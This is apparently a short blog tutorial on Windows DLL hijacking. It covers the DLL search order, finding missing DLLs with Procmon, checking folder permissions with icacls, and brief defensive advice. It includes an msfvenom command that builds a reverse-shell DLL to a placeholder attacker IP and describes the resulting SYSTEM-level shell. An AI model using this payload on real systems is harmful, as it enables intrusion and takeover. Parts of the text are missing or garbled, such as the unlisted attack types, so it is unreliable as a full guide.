DLL Hijacking Attack

So what is DLL?

To understand DLL hijacking we need to understand what is DLL.

DLL Hijacking

DLL hijacking is an attack which exploits the task carried out by Windows search and load algorithm, wherein allowing an attacker to inject code/payload into an application through disk manipulation. which is simply writing a malicious DLL file in the right place causes a vulnerable application to load that malicious DLL. The attack on the DLL has been used since the beginning of Windows 2000 and works perfectly till date.

  • C:\Windows\System32
  • C:\Windows\System
  • C:\Windows
  • The current working directory
  • Directories in the system PATH environment variable
  • Directories in the user PATH environment variable

Types of DLL Hijacking attacks

DLL Hijacking attacks are broadly classified into three types they are as follow :

Configure the filter in Procman which will filter all the process which have missing DLL’s
As we can see the Procman have filtered all the process of application which has failed to locate a DLL
icacls c:\PS
  • (CI) — container inherit;
  • (IO) — inherit only;
  • (NP) — don’t propagate inherit;
  • (I) — permission inherited from the parent container.
  • F — full access;
  • N — no access;
  • M — modify access;
  • RX — read and eXecute access;
  • R — read-only access;
  • W — write-only access.
Command:msfvenom -p windows/shell_reverse_tcp lhost=<ip> lport=<listening port> -f dll -o <dll name>
The target application is running as a system
The generated Malicious DLL
The connection is created and can be used to perform malicious activity

How to safeguard the end system from DLL hijacking.

To guard against DLL hijacking necessities to begin from the product designers. If developers utilize outright ways to characterize the normal area of Dynamic Link Libraries in the product code, the vulnerability can be enormously decreased.

Reference:

https://www.cyberark.com/threat-research-blog/i-know-what-azure-did-last-summer/

Wanna connect:

Linkedin: https://www.linkedin.com/in/akshay-jain-533a79111/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store